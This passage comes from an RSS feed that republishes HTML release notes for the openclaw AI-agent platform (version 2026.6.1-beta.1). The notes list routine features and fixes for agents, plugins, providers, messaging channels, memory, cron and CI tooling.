<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>iOS: support native iPad display layouts.</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Workboard: wire task-backed board runs and show task comments in the edit modal.</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Code mode: add MCP API files and docs for code-mode integrations.</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Control UI: add calmer chat composer controls, local draft typing state, and first-output latency instrumentation for active chat entry. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Plugins: persist the plugin install index in SQLite so installed package lookup survives reloads with less filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>)</li>
<li>Providers: add MiniMax M3 model support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>Doctor: add disk space health checks and stabilize post-upgrade JSON probes.</li>
<li>Channels: store inbound queues in SQLite and migrate iMessage monitor state to SQLite-backed tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/TUI: keep local custom provider runs from loading plugin runtime and auth alias metadata when plugins are disabled.</li>
<li>Agents/TUI: restore in-flight TUI run switch-back behavior, keep no-policy native hook fallback available, guard vanished workspaces, and keep lightweight isolated subagents lightweight.</li>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Agents/Codex: stream Codex app-server final-answer partials to live reply previews, preserve ACP metadata in SQLite, prefer real tool results over synthetic repair output, prevent aborted app-server turn handles from lingering, migrate legacy OpenAI Codex <code>lastGood</code> auth state, and preserve workspace/session metadata through ACP runtime refactors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555235950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88405/hovercard" href="https://github.com/openclaw/openclaw/issues/88405">#88405</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558386594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88724/hovercard" href="https://github.com/openclaw/openclaw/pull/88724">#88724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558459446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88730" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88730/hovercard" href="https://github.com/openclaw/openclaw/pull/88730">#88730</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/auth: write auth profiles atomically, dispatch auth failures by type, add force re-login recovery, preserve workspaces during state-only uninstall, and compact before oversized turns so recovery paths avoid partial state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565425402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89181" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89181/hovercard" href="https://github.com/openclaw/openclaw/pull/89181">#89181</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Skills: skip disabled skill env overrides from stale persisted snapshots so disabled skill <code>apiKey</code> SecretRefs cannot abort embedded or channel turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>CLI: avoid live catalog validation during <code>openclaw agents add</code>, so adding a secondary agent no longer depends on provider catalog availability. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370229397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76284/hovercard" href="https://github.com/openclaw/openclaw/issues/76284">#76284</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>CLI/desktop: bridge WSL clipboard operations through the shell, recognize manual-update launchd jobs, and keep machine-readable startup output parseable during progress setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558805270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88764/hovercard" href="https://github.com/openclaw/openclaw/pull/88764">#88764</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558107169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88689" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88689/hovercard" href="https://github.com/openclaw/openclaw/pull/88689">#88689</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexzhu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexzhu0">@alexzhu0</a>.</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Plugins: clarify plugin loader failure guidance so missing or incompatible plugin packages point operators at the right repair path.</li>
<li>Plugins: preserve npm plugin roots after blocked installs, skip plugin-local <code>openclaw</code> peer symlinks during rollback snapshots, relink those peers after restore, isolate cached tool runtime siblings, and isolate web-provider factory failures so one bad plugin does not poison sibling runtime paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375645088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77237" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77237/hovercard" href="https://github.com/openclaw/openclaw/pull/77237">#77237</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559215204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88807/hovercard" href="https://github.com/openclaw/openclaw/pull/88807">#88807</a>)</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Cron: keep update delivery validation scoped, harden restart state, and retire MCP runtimes on isolated cron cleanup.</li>
<li>Memory: serialize QMD update/embed writes per store, warn before gateway watcher FD pressure, reduce Linux watcher fan-out, retry transient FileProvider-backed reads, preserve phase signals on read errors, harden envelope metadata sanitization, and rewrite generated transcript paths on rollover so memory/search state survives concurrent gateway and CLI activity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259457800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66339/hovercard" href="https://github.com/openclaw/openclaw/issues/66339">#66339</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510532697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85931/hovercard" href="https://github.com/openclaw/openclaw/pull/85931">#85931</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565501615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89185" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89185/hovercard" href="https://github.com/openclaw/openclaw/pull/89185">#89185</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565570172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89188" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89188/hovercard" href="https://github.com/openclaw/openclaw/pull/89188">#89188</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502554299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85351" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85351/hovercard" href="https://github.com/openclaw/openclaw/pull/85351">#85351</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers: resolve Google defaults to <code>google-generative-ai</code>, register Vertex static catalog rows, align Foundry reasoning metadata, skip DeepSeek V4 thinking params on Foundry fallback, use MiniMax account OAuth endpoints, preserve Copilot Claude 1M capabilities, suppress disabled Ollama reasoning output, keep OpenAI stop-finished tool calls, and avoid replay ids when the Responses store is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>)</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, plugin npm verification commands, changelog restore, cross-OS process groups, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Telegram credential timeouts, Control UI i18n and CLI startup metadata generation, Vitest routing, dependency guard admin approvals, child workflow failure detection, docker package cleanup, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4560993509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88966" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88966/hovercard" href="https://github.com/openclaw/openclaw/pull/88966">#88966</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Release/CI/E2E: keep Kitchen Sink live plugin MCP probes resolving source-checkout workspace packages and align the live gauntlet with current Kitchen Sink diagnostics.</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Chat/UI: preserve startup chat sends during history loading, unblock the initial Control UI chat send, stream chat deltas incrementally, skip markdown parsing while streaming, keep drafts local while typing, guard composer rerenders, honor Chromium executable overrides, and detect system Chromium for E2E. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: preserve long Feishu streaming replies, send visible fallbacks when accepted Feishu turns produce no final reply, tolerate iMessage self-chat timestamp skew, preserve colon-prefixed slash commands in mention parsing, decode Nostr <code>npub</code> allowlists correctly, and suppress raw provider errors during channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545822590" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87896" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87896/hovercard" href="https://github.com/openclaw/openclaw/pull/87896">#87896</a>)</li>
<li>Config/status/doctor: skip unresolved shell references in state-dir dotenv files, resolve gateway auth secrets during deep status audits, respect explicit PI runtime policy, report runtime tool-schema errors, and keep post-upgrade JSON stable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554055557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88288/hovercard" href="https://github.com/openclaw/openclaw/pull/88288">#88288</a>)</li>
<li>Gateway/session state: list commands from the Gateway plugin registry, harden MCP loopback tool schemas, hide phantom agent-store rows from <code>sessions.list</code>, make task persistence failures explicit, and carry session UUIDs on interactive dispatch events.</li>
<li>OpenAI/TTS: handle speed directives for OpenAI TTS voices. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348062227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74089" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74089/hovercard" href="https://github.com/openclaw/openclaw/pull/74089">#74089</a>)</li>
<li>CI/Crabbox: keep default runner capacity on the Azure credit-backed on-demand D4 lane with the Azure SSH port and a Git-independent full check job, so broad validation avoids low-priority spot quota stalls, hydrate port mismatches, non-Git hydrated workspaces, and stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.6.1-beta.1]]></title>
<description><![CDATA[2026.6.1
Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Sl...]]></description>
<link>https://tsecurity.de/de/3562543/downloads/openclaw-202661-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562543/downloads/openclaw-202661-beta1/</guid>
<pubDate>Mon, 01 Jun 2026 11:46:18 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.6.1</h2>
<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
